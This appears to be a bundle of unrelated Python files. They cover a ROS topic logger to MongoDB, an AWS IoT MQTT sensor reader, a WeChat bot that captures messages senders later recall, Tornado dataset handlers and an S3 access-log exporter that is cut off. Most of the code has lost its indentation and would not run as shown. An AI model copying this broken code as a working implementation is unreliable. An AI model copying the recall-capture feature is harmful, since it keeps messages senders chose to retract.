self.subscribe_topics(new_topics)
if restart: self.start_all_topics_timer()
def fill_in_topics(self, restart=True):
"""
Called at a fixed interval (see start_fill_in_topics_timer) to retry subscribing to requested topics that were not available earlier.
"""
if len(self.missing_topics) == 0 or self.quit: return
self.missing_topics = self.subscribe_topics(self.missing_topics)
if restart: self.start_fill_in_topics_timer()
def get_memory_usage_for_pid(self, pid):
scale = {'kB': 1024, 'mB': 1024 * 1024,
'KB': 1024, 'MB': 1024 * 1024}
try:
f = open("/proc/%d/status" % pid)
t = f.read()
f.close()
except:
return (0, 0, 0)
if t == "": return (0, 0, 0)
try:
tmp = t[t.index("VmSize:"):].split(None, 3)
size = int(tmp[1]) * scale[tmp[2]]
tmp = t[t.index("VmRSS:"):].split(None, 3)
rss = int(tmp[1]) * scale[tmp[2]]
tmp = t[t.index("VmStk:"):].split(None, 3)
stack = int(tmp[1]) * scale[tmp[2]]
return (size, rss, stack)
except ValueError:
return (0, 0, 0)
def get_memory_usage(self):
size, rss, stack = 0, 0, 0
for w in self.workers:
pmem = self.get_memory_usage_for_pid(w.process.pid)
size += pmem[0]
rss += pmem[1]
stack += pmem[2]
#print("Size: %d RSS: %s Stack: %s" % (size, rss, stack))
return (size, rss, stack)
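# Hedged illustration of the collection naming described in
# MongoWriter.subscribe_topics above: topic names are passed through
# mongodb_store.util.topic_name_to_collection_name so the resulting collection
# names play well with the query tools, and two topics that map to the same
# collection name are treated as a clash. The topic strings below are
# illustrative only.
def _example_collection_names(topic_a="/robot/pose", topic_b="/robot_pose"):
    name_a = mongodb_store.util.topic_name_to_collection_name(topic_a)
    name_b = mongodb_store.util.topic_name_to_collection_name(topic_b)
    return name_a, name_b, name_a == name_b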
def main(argv):
parser = OptionParser()
parser.usage += " [TOPICs...]"
parser.add_option("--nodename-prefix", dest="nodename_prefix",
help="Prefix for worker node names", metavar="ROS_NODE_NAME",
default="")
parser.add_option("--mongodb-host", dest="mongodb_host",
help="Hostname of MongoDB", metavar="HOST",
default=rospy.get_param("mongodb_host", "localhost"))
parser.add_option("--mongodb-port", dest="mongodb_port",
help="Hostname of MongoDB", type="int",
metavar="PORT", default=rospy.get_param("mongodb_port", 27017))
parser.add_option("--mongodb-name", dest="mongodb_name",
help="Name of DB in which to store values",
metavar="NAME", default="roslog")
parser.add_option("--mongodb-collection", dest="mongodb_collection",
help="Name of Collection in which to store values. All topics are stored in the collection if used this option, otherwise topic names are used as collections",
metavar="COLLECTION", default=None)
parser.add_option("-a", "--all-topics", dest="all_topics", default=False,
action="store_true",
help="Log all existing topics (still excludes /rosout, /rosout_agg)")
parser.add_option("-e", "--regex", dest="treat_as_regex", default=False,
help="Log topics matching the follow regular expression",
action="store_true")
parser.add_option("--all-topics-interval", dest="all_topics_interval", default=5,
help="Time in seconds between checks for new topics", type="int")
parser.add_option("-x", "--exclude", dest="exclude",
help="Exclude topics matching REGEX, may be given multiple times",
action="append", type="string", metavar="REGEX", default=[])
parser.add_option("--no-specific", dest="no_specific", default=False,
action="store_true", help="Disable specific loggers")
(options, args) = parser.parse_args(rospy.myargv(argv=sys.argv)[1:])
if not options.all_topics and len(args) == 0:
parser.print_help()
return
try:
rosgraph.masterapi.Master(NODE_NAME_TEMPLATE % options.nodename_prefix).getPid()
except socket.error:
print("Failed to communicate with master")
mongowriter = MongoWriter(topics=args,
treat_as_regex=options.treat_as_regex,
all_topics=options.all_topics,
all_topics_interval = options.all_topics_interval,
exclude_topics = options.exclude,
mongodb_host=options.mongodb_host,
mongodb_port=options.mongodb_port,
mongodb_name=options.mongodb_name,
mongodb_collection=options.mongodb_collection,
no_specific=options.no_specific,
nodename_prefix=options.nodename_prefix)
def signal_handler(signal, frame):
mongowriter.shutdown()
signal.signal(signal.SIGTERM, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
mongowriter.run()
if __name__ == "__main__":
main(sys.argv)
|
base.py
|
import json
import copy
import threading
import array
import struct
import time
import csv
import os
import subprocess
import paho.mqtt.client as paho
import ssl
# FILL THIS WITH YOUR CREDENTIALS AND CERTS FOLDER
EndPoint = "xxxxxxxxxxxxxx.iot.us-east-1.amazonaws.com"
topic = 'birds-detected'
caPath = "Certs/ca.cert"
certPath = "Certs/client.cert"
keyPath = "Certs/priv.cert"
try:
from sources.buffers import CircularBufferQueue, CircularResultsBufferQueue
except:
from buffers import CircularBufferQueue, CircularResultsBufferQueue
SHORT = 2
def on_connect(client, userdata, flags, rc):
print("Connection returned result: " + str(rc))
mqttc = paho.Client()
mqttc.on_connect = on_connect
mqttc.tls_set(caPath, certfile=certPath, keyfile=keyPath,
cert_reqs=ssl.CERT_REQUIRED, tls_version=ssl.PROTOCOL_TLSv1_2, ciphers=None)
mqttc.connect(EndPoint, 8883, keepalive=60)
class BaseReader(object):
""" Base Reader Object, describes the methods that must be implemented for each data source"""
def __init__(self, config, device_id=None, name=None, **kwargs):
self.samples_per_packet = config["CONFIG_SAMPLES_PER_PACKET"]
self.class_map = config["CLASS_MAP"]
self.loop = config["LOOP"]
self.name = name
self.source_samples_per_packet = None
self.sample_rate = None
self.config_columns = None
self.device_id = device_id
self.recording = False
self.streaming = False
self._thread = None
self._record_thread = None
self.buffer = None
self.rbuffer = None
self._lock = threading.Lock()
@property
def data_width(self):
if self.config_columns is None:
return 0
return len(self.config_columns)
@property
def packet_buffer_size(self):
return self.samples_per_packet * self.source_buffer_size
@property
def source_buffer_size(self):
if self.source_samples_per_packet is None:
return 2
return self.source_samples_per_packet * self.data_width * SHORT
@staticmethod
def _validate_config(config):
if not isinstance(config, dict):
raise Exception("Invalid Configuration")
if config.get("column_location", None) is None:
raise Exception("Invalid Configuration: no column_location")
if config.get("sample_rate", None) is None:
raise Exception("Invalid Configuration: no sample_rate")
if config.get("samples_per_packet", None) is None:
raise Exception("Invalid Configuration: no samples_per_packet")
return config
@staticmethod
def _validate_results_data(data):
try:
tmp = json.loads(data)
if isinstance(tmp, dict) and tmp:
return True
except Exception as e:
print(e)
return False
def is_recording(self):
return self.recording
def is_streaming(self):
return self.streaming
def list_available_devices(self):
return []
def _send_subscribe(self):
pass
def read_config(self):
""" read the config from the device and set the properties of the object """
config = self.read_device_config()
self.source_samples_per_packet = config.get("samples_per_packet", None)
self.sample_rate = config.get("sample_rate", None)
self.config_columns = config.get("column_location", None)
print("Setting Configuration")
return config
def update_config(self, config):
""" update the objects local config values from the app cache """
self.samples_per_packet = config["CONFIG_SAMPLES_PER_PACKET"]
self.source_samples_per_packet = config["SOURCE_SAMPLES_PER_PACKET"]
self.sample_rate = config["CONFIG_SAMPLE_RATE"]
self.config_columns = config.get("CONFIG_COLUMNS")
self.class_map = config.get("CLASS_MAP")
def connect(self):
if self._thread is None:
"Assume if there is a thread, we are already connected"
self.buffer = CircularBufferQueue(
self._lock, buffer_size=self.packet_buffer_size
)
self.rbuffer = CircularResultsBufferQueue(
self._lock, buffer_size=1)
self._send_subscribe()
time.sleep(1)
self.buffer.reset_buffer()
self._thread = threading.Thread(target=self._read_source)
self._thread.start()
time.sleep(1)
else:
print("Thread Already Started!")
def disconnect(self):
self.streaming = False
self._thread = None
self._record_thread = None
self.recording = False
self.buffer.reset_buffer()
self.rbuffer.reset_buffer()
def record_start(self, filename):
if not self.streaming:
raise Exception("Must start streaming before begging to record!")
if self.recording:
raise Exception("Only a single recording can occur at one time")
if filename is None:
raise Exception("Invalid Filename")
if not os.path.exists(os.path.dirname(filename)):
print(
"File directory does not exist, recording to data directory in gateway location."
)
if not os.path.exists("./data"):
os.mkdir("./data")
filename = os.path.join("./data", os.path.basename(filename))
self.recording = True
self._record_thread = threading.Thread(
target=self._record_data, kwargs={"filename": filename}
)
self._record_thread.start()
def record_stop(self, filename=None):
if not self.recording:
raise Exception("Not currently recording")
self._record_thread = None
self.recording = False
return True
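# Hedged sketch of the configuration dict consumed by BaseReader above. The
# keys mirror the ones read in __init__ and update_config; the literal values
# and column names are illustrative assumptions, not project defaults.
def _example_reader_config():
    return {
        "CONFIG_SAMPLES_PER_PACKET": 10,
        "SOURCE_SAMPLES_PER_PACKET": 10,
        "CONFIG_SAMPLE_RATE": 100,
        "CONFIG_COLUMNS": {"AccelX": 0, "AccelY": 1, "AccelZ": 2},
        "CLASS_MAP": {"1": "unknown"},
        "LOOP": False,
    }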
class BaseStreamReaderMixin(object):
def read_data(self):
""" Generator to read the data stream out of the buffer """
print("starting read")
if self._thread:
pass
else:
print("sent connect")
self.connect()
self.streaming = True
index = self.buffer.get_latest_buffer()
while self.streaming:
if index is None:
index = self.buffer.get_latest_buffer()
time.sleep(0.1)
continue
if self.buffer.is_buffer_full(index):
data = self.buffer.read_buffer(index)
index = self.buffer.get_next_index(index)
if data:
yield data
time.sleep(0.001)
print("stream ended")
def _record_data(self, filename):
with open(filename + ".csv", "w", newline="") as csvfile:
datawriter = csv.writer(csvfile, delimiter=",")
print("Starting to Record .csv")
datawriter.writerow(
[
x[0]
for x in sorted(
self.config_columns.items(), key=lambda item: item[1]
)
]
)
struct_info = "h" * self.data_width
data_reader = self.read_data()
while self.recording:
data = next(data_reader)
if data:
for row_index in range(len(data) // (self.data_width * 2)):
buff_index = row_index * self.data_width * 2
datawriter.writerow(
struct.unpack(
struct_info,
data[buff_index: buff_index +
self.data_width * 2],
)
)
print("CSV recording thread finished")
class BaseResultReaderMixin(object):
def read_device_config(self):
print("here")
return {"samples_per_packet": 1}
def _map_classification(self, results):
if self.class_map:
results["Classification"] = self.class_map.get(
results["Classification"], results["Classification"]
)
return results
def read_data(self):
""" Genrator to read the result stream out of the buffer """
print("starting result read")
if self._thread:
pass
else:
print("sent connect")
self.connect()
index = self.rbuffer.get_latest_buffer()
while self.streaming:
if index is None:
index = self.rbuffer.get_latest_buffer()
time.sleep(0.1)
continue
if self.rbuffer.is_buffer_full(index):
data = self.rbuffer.read_buffer(index)
index = self.rbuffer.get_next_index(index)
for result in data:
if self._validate_results_data(result):
mqttc.publish(topic, result)
mqttc.loop()
result = self._map_classification(json.loads(result))
result["timestap"] = time.time()
print(result)
yield json.dumps(result) + "\n"
else:
time.sleep(0.1)
print("result stream ended")
def _record_data(self, filename):
with open(filename + ".csv", "w", newline="") as out:
data_reader = self.read_data()
while self.recording:
data = next(data_reader)
if data:
out.write(data)
print("recording thread finished")
|
wx_lib.py
|
"""
参数 l类型 Text 键值
TEXT 文本 文本内容(文字消息)
MAP 地图 位置文本(位置分享)
CARD 名片 推荐人字典(推荐人的名片)
SHARING 分享 分享名称(分享的音乐或者文章等)
PICTURE 下载方法 图片/表情
RECORDING 语音 下载方法
ATTACHMENT 附件 下载方法
VIDEO 小视频 下载方法
FRIENDS 好友邀请 添加好友所需参数
SYSTEM 系统消息 更新内容的用户或群聊的UserName组成的列表
NOTE 通知 通知文本(消息撤回等)
"""
import sys
import os
import time
from datetime import datetime
from datetime import timedelta
import re
from time import sleep
# #import queue
from queue import Empty
#-#import asyncio
from setproctitle import setproctitle
import multiprocessing
from multiprocessing.managers import SyncManager
#-#import concurrent
# #import logging
import _thread
import itchat
from itchat.content import TEXT, FRIENDS, MAP, CARD, NOTE, SHARING, PICTURE, RECORDING, ATTACHMENT, VIDEO
#-#from selenium import webdriver
#-#from selenium.common.exceptions import NoSuchElementException
from IPython import embed
embed
if __name__ == '__main__':
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))
# #from applib.tools_lib import pcformat
from applib.conf_lib import getConf
from applib.log_lib import get_lan_ip
from applib.log_lib import app_log
info, debug, warn, error = app_log.info, app_log.debug, app_log.warning, app_log.error
msg_information = {}
face_bug = None  # holds the content of the most recent sticker/emoji message
attachment_dir = None
class ItchatManager(object):
"""微信管理类
"""
def __init__(self, conf_path='config/pn_conf.yaml'):
global attachment_dir
self.conf_path = os.path.abspath(conf_path)
self.conf = getConf(self.conf_path, root_key='itchat')
attachment_dir = os.path.abspath(self.conf['attachment_dir'])
self.thread_id = None
self.gid = None  # stores the UserName of the "我们" group chat
if self.conf['use_custom_manager']:
# create proxy manager
class MySyncManager(SyncManager):
pass
MySyncManager.register('get_wx_send_q')
mgr = MySyncManager((get_lan_ip(), self.conf['custom_manager_port']), self.conf['custom_manager_authkey'].encode('utf8'))
#-# sleep(0.5) # wait for manager to start
mgr.connect()
self.q_send = mgr.get_wx_send_q()
else:
mgr = multiprocessing.Manager()
self.q_send = mgr.Queue()
self.event_exit = mgr.Event()
multiprocessing.current_process().authkey = self.conf['custom_manager_authkey'].encode('utf8') # https://bugs.python.org/issue7503
self.proc_wx = multiprocessing.Process(target=self.run, args=(self.event_exit, self.q_send))
self.proc_wx.start()
def onLogin(self):
info('itchat login ok ~')
def onExit(self):
info('itchat exit')
def run(self, event_exit, q_send):
setproctitle('wx_proc')
self.start()
if self.thread_id is None:
self.thread_id = _thread.start_new_thread(itchat.run, (), {'debug': self.conf['debug'], })
info('instance %s', itchat.instanceList[-1])
info('itchat running')
else:
info('itchat already running')
if self.gid is None:  # the "我们" group is sometimes not found right after login, so look it up repeatedly
try:
debug('finding chatroom ...')
groups = itchat.get_chatrooms(update=True)
for _g in groups:
if _g['MemberCount'] == 3 and _g.Self.NickName == "刘强":
self.gid = _g['UserName']
info('我们 gid %s', self.gid)
break
else:
debug('chatroom not found')
#-# debug('%s\t%s', _g['NickName'], _g['UserName'])
#-# g = itchat.search_chatrooms(name="我们")
#-# if g:
#-# g = g[0]
#-# info('g %s %s', g['UserName'], g['MemberCount'])
#-# if g['MemberCount'] == 3 and g.Self.NickName == "刘强":
#-# self.gid = g['UserName']
#-# info('我们 gid %s', self.gid)
#-# else:
#-# debug('chatroom not found')
except Exception:
error('error finding chatroom 我们', exc_info=True)
while 1:
#-# embed()
try:
msg, who = q_send.get(timeout=30)
except KeyboardInterrupt:
warn('got KeyboardInterrupt when waiting for msg to send, exit!')
break
except Empty:
if event_exit.is_set():
info('got exit flag, exit~')
break
except Exception as e:
warn('got exception when waiting for msg to send, exit! %s', e)
break
else:
if not msg and not who:
info('break !!!')
break
self.sendMsg(msg, toUserName=who)
if event_exit.is_set():
info('got exit flag, exit~')
break
self.clean()
def start(self):
info('itchat starting ..')
itchat.auto_login(enableCmdQR=2, hotReload=True, picDir='/tmp', statusStorageDir='config/itchat.pkl', loginCallback=self.onLogin, exitCallback=self.onExit)
#-# groups = itchat.get_chatrooms()
#-# for _g in groups:
#-# info('%s\t%s', _g['NickName'], _g['UserName'])
#-# g = itchat.search_chatrooms(name="我们")
#-# if g:
#-# g = g[0]
#-# info('g %s %s', g['UserName'], g['MemberCount'])
#-# if g['MemberCount'] == 3 and g.Self.NickName == "刘强":
#-# self.gid = g['UserName']
#-# info('我们 gid %s', self.gid)
info('itchat started')
def stop(self):
itchat.logout()
info('itchat logout')
def clean(self):
self.stop()
@staticmethod
@itchat.msg_register([TEXT, PICTURE, FRIENDS, CARD, MAP, SHARING, RECORDING, ATTACHMENT, VIDEO], isFriendChat=True, isGroupChat=True, isMpChat=True)
def handle_receive_msg(msg):
global face_bug, attachment_dir
msg_time_rec = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())  # time the message was received
user_info = itchat.search_friends(userName=msg['FromUserName'])  # look up the sender's nickname in the friend list
msg_from = msg['FromUserName'] if not user_info else user_info['NickName']  # sender nickname, falling back to FromUserName
msg_time = msg['CreateTime']  # time the message was sent
msg_id = msg['MsgId']  # id of this message
msg_content = None  # holds the message content
msg_share_url = None  # holds a shared link, e.g. a shared article or song
#-# info('[%s %s] %s', msg['Type'], msg['MsgId'], msg_from)
if msg['Type'] in ('Text', 'Friends'):  # a text message or a friend recommendation
msg_content = msg['Text']
info('[%s %s] %s: %s', msg['Type'], msg['MsgId'], msg_from, msg_content)
#-# info('%s', msg_content)
elif msg['Type'] in ('Attachment', 'Video', 'Picture', 'Recording'):  # an attachment, video, picture or voice message
msg_content = msg['FileName']  # the content is the file name
msg['Text'](os.path.join(attachment_dir, msg_content))  # download the file
info('[%s %s] %s', msg['Type'], msg['MsgId'], msg_from)
# print msg_content
elif msg['Type'] == 'Card':  # a recommended name card
msg_content = msg['RecommendInfo']['NickName'] + '的名片'  # content is the recommended person's nickname and gender
if msg['RecommendInfo']['Sex'] == 1:
msg_content += '性别为男'
else:
msg_content += '性别为女'
#-# info('%s', msg_content)
info('[%s %s] %s: %s', msg['Type'], msg['MsgId'], msg_from, msg_content)
elif msg['Type'] == 'Map':  # a shared location
x, y, location = re.search("<location x=\"(.*?)\" y=\"(.*?)\".*label=\"(.*?)\".*", msg['OriContent']).group(1, 2, 3)
if location is None:
msg_content = "纬度->" + x.__str__() + " 经度->" + y.__str__() # 内容为详细的地址
else:
msg_content = location
info('[%s %s] %s: %s', msg['Type'], msg['MsgId'], msg_from, msg_content)
elif msg['Type'] == 'Sharing':  # shared music or an article; the content is its title or name
msg_content = msg['Text']
msg_share_url = msg['Url']  # record the shared url
#-# info('%s', msg_share_url)
info('[%s %s] %s: %s', msg['Type'], msg['MsgId'], msg_from, msg_share_url)
face_bug = msg_content
# store the message in the dict, one entry per msg_id
msg_information.update(
{
msg_id: {
"msg_from": msg_from, "msg_time": msg_time, "msg_time_rec": msg_time_rec,
"msg_type": msg["Type"],
"msg_content": msg_content, "msg_share_url": msg_share_url
}
}
)
# drop messages older than 5 minutes
l_msgid_2del = []
time_5min_early = (datetime.now() + timedelta(minutes=-5)).strftime("%Y-%m-%d %H:%M:%S")
for _msgid, _v in msg_information.items():
if _v['msg_time_rec'] <= time_5min_early:
l_msgid_2del.append(_msgid)
if l_msgid_2del:
info('del %s old msg', len(l_msgid_2del))
for _msgid in l_msgid_2del:
msg_information.pop(_msgid, None)
# listens for message-recall notifications
@itchat.msg_register(NOTE, isFriendChat=True, isGroupChat=True, isMpChat=True)
def information(msg):
# if msg['Content'] contains a recall notice and a message id, handle it below
if '撤回了一条消息' in msg['Content']:
old_msg_id = re.search("\<msgid\>(.*?)\<\/msgid\>", msg['Content']).group(1) # 在返回的content查找撤回的消息的id
old_msg = msg_information.get(old_msg_id) # 得到消息
info('old msg: %s', old_msg)
if not old_msg:  # message not found
return
if len(old_msg_id) < 11:  # a sticker/emoji was recalled
itchat.send_file(face_bug, toUserName='filehelper')
else:  # send a recall notice to the file helper
msg_body = "告诉你一个秘密~" + "\n" \
+ old_msg.get('msg_from') + " 撤回了 " + old_msg.get("msg_type") + " 消息" + "\n" \
+ old_msg.get('msg_time_rec') + "\n" \
+ "撤回了什么 ⇣" + "\n" \
+ old_msg.get('msg_content')
# if a shared item was recalled, append its url to msg_body for the file helper
if old_msg['msg_type'] == "Sharing":
msg_body += "\n就是这个链接➣ " + old_msg.get('msg_share_url')
# send the recall notice to the file helper
itchat.send_msg(msg_body, toUserName='filehelper')
# if there is an associated file, send it along as well
if old_msg['msg_type'] in ('Picture', 'Recording', 'Video', 'Attachment'):
f = '@fil@%s' % (old_msg['msg_content'])
itchat.send(msg=f, toUserName='filehelper')
if os.path.exists(old_msg['msg_content']):
os.remove(old_msg['msg_content'])
# remove the old message from the dict
msg_information.pop(old_msg_id)
def sendMsg(self, msg_body, toUserName='filehelper'):
if not toUserName:
toUserName = 'filehelper'
if toUserName != 'filehelper' and toUserName[0] != '@':  # need to look up the WeChat id from the display name
users = itchat.search_friends(name=toUserName)
if users:
# # debug(f'use {users[0]["UserName"]} from {toUserName}')
toUserName = users[0]['UserName']
try:
itchat.send_msg(msg_body, toUserName)
#-# debug('send %s %s', msg_body, self.gid if self.gid else toUserName)
except Exception:
error('got except', exc_info=True)
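# Hedged sketch (not part of the original module): when use_custom_manager is
# enabled in pn_conf.yaml, another process is assumed to reach the shared send
# queue through the same SyncManager proxy registered above and push
# (message, toUserName) tuples for ItchatManager.run to deliver.
def _example_remote_send(msg, who='filehelper', conf_path='config/pn_conf.yaml'):
    class _RemoteManager(SyncManager):
        pass
    _RemoteManager.register('get_wx_send_q')
    conf = getConf(os.path.abspath(conf_path), root_key='itchat')
    mgr = _RemoteManager((get_lan_ip(), conf['custom_manager_port']),
                         conf['custom_manager_authkey'].encode('utf8'))
    mgr.connect()
    mgr.get_wx_send_q().put((msg, who))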
if __name__ == '__main__':
it = ItchatManager()
while 1:
try:
sleep(10)
except KeyboardInterrupt:
info('cancel on KeyboardInterrupt..')
it.clean()
|
datasets.py
|
from __future__ import absolute_import, print_function, division
import logging
import os
import tornado.web
import yaml
from tornado import gen
from threading import Thread
from .common import BaseHandler
from ..web_datasets import DATASETS
class RefreshHandler(BaseHandler):
@tornado.web.authenticated
def get(self):
self.write('''<form action='refresh' method='POST'>
<input type='submit' value='Refresh Data'>
</form>''')
@gen.coroutine
def post(self):
logging.info('Refreshing datasets')
for ds in self.all_datasets():
yield gen.Task(RefreshHandler._reload, ds)
self.redirect('/datasets')
@staticmethod
def _reload(ds, callback=None):
t = Thread(target=lambda: callback(ds.reload()))
t.daemon = True
t.start()
class RemovalHandler(BaseHandler):
def post(self):
ds = self.request_one_ds('kind', 'name')
if not ds.user_added:
return self.visible_error(403, 'Cannot remove this dataset.')
logging.info('Removing user-added dataset: %s', ds)
del DATASETS[ds.kind][ds.name]
self.redirect('/datasets')
# Remove the dataset from user-uploaded files.
config_path = os.path.join(os.path.dirname(__file__),
'../../uploads/user_data.yml')
if os.path.exists(config_path):
config = yaml.safe_load(open(config_path))
entry = config[ds.kind].pop(ds.name)
os.remove(entry['file'])
yaml.safe_dump(config, open(config_path, 'w'), allow_unicode=True)
routes = [
(r'/_remove_dataset', RemovalHandler),
(r'/refresh', RefreshHandler),
]
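# Hedged sketch (not part of the original module): these route tuples are
# assumed to be merged with the routes of the other handler modules and handed
# to a tornado Application elsewhere in the project; the settings below are
# illustrative only.
def _example_make_app():
    return tornado.web.Application(routes, login_url='/login', cookie_secret='CHANGE-ME')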
|
export.py
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
from datetime import datetime, timedelta
import gc
import logging
from multiprocessing import get_context
import os
from pathlib import Path
import queue
import sys
import traceback
from urllib.parse import urlparse
import uuid
import pandas as pd
import pyarrow as pa
import pytz
import s3fs
from s3access.normalize import deserialize_file
from s3access.parquet import write_dataset
from s3access.schema import create_schema
from s3access.wg import WaitGroup
def parse_time(object_name):
return datetime.strptime(object_name[0:19], "%Y-%m-%d-%H-%M-%S")
def create_files_index(src, hour, timezone, fs):
"""
:param str src: The source location, either an s3:// URL or a local directory
:param str hour: The hour being targeted, in the format YYYY-MM-DD-HH
:param timezone: The pytz timezone used to localize the parsed timestamps
:param fs: The s3fs filesystem for s3 sources (unused for local paths)
:return: A DataFrame with one row per file, including path and datetime
"""
files = []
if src.startswith("s3://"):
u = urlparse(src)
files = [
{"path": f, "dt": timezone.localize(parse_time(os.path.basename(f)))}
for f in fs.glob(("{}{}/{}*").format(u.netloc, u.path, hour))
]
else:
files = [
{
"path": f.as_posix(),
"dt": timezone.localize(parse_time(os.path.basename(f))),
}
for f in Path(src).rglob("*")
]
return pd.DataFrame(files)
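# Hedged usage sketch: for an s3:// source the hour prefix is used to glob
# matching objects and an s3fs filesystem is required; for a local directory
# every file under src is indexed and the filesystem argument is unused. The
# path below is illustrative only.
def _example_local_index():
    utc = pytz.timezone("UTC")
    return create_files_index("/tmp/access-logs/", "2021-06-01-14", utc, None)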
def create_file_system(root, endpoint_url, endpoint_region, s3_acl, logger):
logger.info("Creating filesystem for {}".format(root))
if root.startswith("s3://"):
return s3fs.S3FileSystem(
anon=False,
client_kwargs={
"endpoint_url": endpoint_url,
"region_name": endpoint_region,
"use_ssl": True,
},
s3_additional_kwargs={
"ACL": s3_acl,
},
)
else:
os.makedirs(root, exist_ok=True)
return None
def aggregate_range(
ctx,
src,
dst,
files,
timezone,
logger,
schema,
input_file_system,
output_file_system,
tracking_file_system,
tracking_dst,
hour,
cpu_count,
timeout,
logging_queue,
):
items = []
logger.info("Deserializing data in files from {}".format(src))
with ctx.Pool(processes=int(cpu_count)) as pool:
wg = WaitGroup()
def deserialize_file_callback(outputs):
items.extend(outputs)
wg.done()
def deserialize_file_error_callback(err):
traceback.print_exc()
raise err
for f in files.itertuples():
wg.add(1)
pool.apply_async(
deserialize_file,
args=(f.path, input_file_system, logging_queue),
callback=deserialize_file_callback,
error_callback=deserialize_file_error_callback,
)
logger.info("Waiting for deserialization to complete")
wg.wait(timeout=timeout)
logger.info("Deserialization data in files complete")
if len(items) == 0:
logger.info("No items found in filesystem")
return
gc.collect()
df = pd.DataFrame(items)
logger.info("Serializing {} items to {}".format(len(items), dst))
# Drop the memory footprint and garbage collect
items = []
gc.collect()
write_dataset(
pa.Table.from_pandas(df, schema=schema, preserve_index=False),
dst,
compression="SNAPPY",
partition_cols=["bucket_name", "operation", "year", "month", "day", "hour"],
partition_filename_cb=lambda x: "-".join([str(y) for y in x]) + ".parquet",
row_group_cols=["requester", "remoteip_int", "is_assumed_role", "is_user"],
fs=output_file_system,
cpu_count=cpu_count,
makedirs=(not dst.startswith("s3://")),
timeout=timeout,
logging_queue=logging_queue,
)
logger.info("Serializing items to {} is complete".format(dst))
if tracking_file_system is not None:
logger.info("Tracking completion of task")
tracking_file = "{}{}".format(tracking_dst, hour)
tracking_file_system.touch(tracking_file)
with s3fs.S3File(tracking_file_system, tracking_file, mode="wb") as f:
f.write(
bytearray(
"Completed hour {}. Now: {}\n".format(hour, datetime.now()), "utf-8"
)
)
logger.info("Successful creation file: {}!".format(tracking_file))
def configure_logging():
logger = logging.getLogger()
logger.setLevel(logging.INFO)
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
logger.addHandler(ch)
return logger
def logging_process(logging_queue):
logger = configure_logging()
while True:
try:
# Don't add a timeout here, it just adds log noise
record = logging_queue.get(True)
# We send 'None' as a sentinel to tell the listener to quit looping.
# At the same time tell the logging_queue that no more data is coming.
if record is None:
break
logger.info(record)
except queue.Empty:
print("Queue is empty, killing logging process")
break
except (ValueError, EOFError):
print("Queue is closed, killing logging process")
break
except Exception:
print("Queue is broken")
traceback.print_exc()
break
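# Hedged sketch of the logging pattern used above: worker processes put plain
# strings on the shared queue, and the parent ends the listener by sending the
# None sentinel (the same shutdown path used by graceful_shutdown below).
def _example_logging_round_trip():
    ctx = get_context("spawn")
    q = ctx.Manager().Queue(-1)
    listener = ctx.Process(target=logging_process, args=(q,))
    listener.start()
    q.put("hello from a worker")  # normal record, logged by the listener
    q.put_nowait(None)            # sentinel: tells the listener to exit
    listener.join()
    listener.close()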
def main():
#
# CPU Count
#
cpu_count = os.cpu_count()
#
# Now
#
utc = pytz.timezone("UTC")
now = datetime.now(utc)
#
# Setup Logging
#
logger = configure_logging()
ctx = get_context("spawn")
logging_queue = ctx.Manager().Queue(-1)
listener = ctx.Process(target=logging_process, args=(logging_queue,))
listener.start()
#
# Settings
#
src = os.getenv("SRC")
dst = os.getenv("DST")
tracking_dst = os.getenv("TRACKING_DST")
# Default is to look at the previous hour with the assumption that all the logs exist from that period
# Importantly this makes it easier to trigger on a cron job and know that the appropriate files are being found
default_hour = (now - timedelta(hours=1)).strftime("%Y-%m-%d-%H")
hour = os.getenv("HOUR", default_hour)
s3_default_region = os.getenv("AWS_REGION")
input_s3_acl = os.getenv("INPUT_S3_ACL", "bucket-owner-full-control")
input_s3_region = os.getenv("INPUT_S3_REGION", s3_default_region)
input_s3_endpoint = os.getenv(
"OUTPUT_S3_ENDPOINT",
"https://s3-fips.{}.amazonaws.com".format(input_s3_region),
)
output_s3_acl = os.getenv("OUTPUT_S3_ACL", "bucket-owner-full-control")
output_s3_region = os.getenv("OUTPUT_S3_REGION", s3_default_region)
output_s3_endpoint = os.getenv(
"OUTPUT_S3_ENDPOINT",
"https://s3-fips.{}.amazonaws.com".format(output_s3_region),
)
timeout = int(os.getenv("TIMEOUT", "300"))
logger.info("now: {}".format(now))
logger.info("cpu_count: {}".format(cpu_count))
logger.info("src: {}".format(src))
logger.info("dst: {}".format(dst))
logger.info("tracking_dst: {}".format(tracking_dst))
logger.info("hour: {}".format(hour))
logger.info("timeout: {}".format(timeout))
logger.info("aws-region: {}".format(s3_default_region))
logger.info("input_s3_acl: {}".format(input_s3_acl))
logger.info("input_s3_region: {}".format(input_s3_region))
logger.info("input_s3_endpoint: {}".format(input_s3_endpoint))
logger.info("output_s3_acl: {}".format(output_s3_acl))
logger.info("output_s3_region: {}".format(output_s3_region))
logger.info("output_s3_endpoint: {}".format(output_s3_endpoint))
if src is None or len(src) == 0:
logger.error("{} is missing".format("src"))
graceful_shutdown(listener, logging_queue, 1)
if dst is None or len(dst) == 0:
logger.error("{} is missing".format("dst"))
graceful_shutdown(listener, logging_queue, 1)
if src[len(src) - 1] != "/":
src = src + "/"
if dst[len(dst) - 1] != "/":
dst = dst + "/"
if tracking_dst is not None:
if len(tracking_dst) > 0 and tracking_dst[len(tracking_dst) - 1] != "/":
tracking_dst = tracking_dst + "/"
#
# Initialize File Systems
#
input_file_system = create_file_system(
src, input_s3_endpoint, input_s3_region, input_s3_acl, logger
)
output_file_system = create_file_system(
dst, output_s3_endpoint, output_s3_region, output_s3_acl, logger
)
tracking_file_system = None
if tracking_dst is not None:
if len(tracking_dst) > 0:
tracking_file_system = create_file_system(
tracking_dst,
output_s3_endpoint,
output_s3_region,
output_s3_acl,
logger,
)
#
# Check if this task has been completed already
#
if tracking_file_system is not None:
logger.info("Checking completion of task for hour: {}".format(hour))
tracking_file = "{}{}".format(tracking_dst, hour)
if tracking_file_system.exists(tracking_file):
logger.info("Task completed for hour: {}!".format(tracking_file))
graceful_shutdown(listener, logging_queue, 0)
#
# Load Schema
#
schema = create_schema()
all_files = create_files_index(
src,
hour,
utc,
input_file_system,
)
if len(all_files) == 0:
logger.info("no source files found within folder {}".format(src))
graceful_shutdown(listener, logging_queue, 0)
logger.info("List all files:")
logger.info(all_files)
# Test getting a file from the index and reading it
if input_file_system is not None:
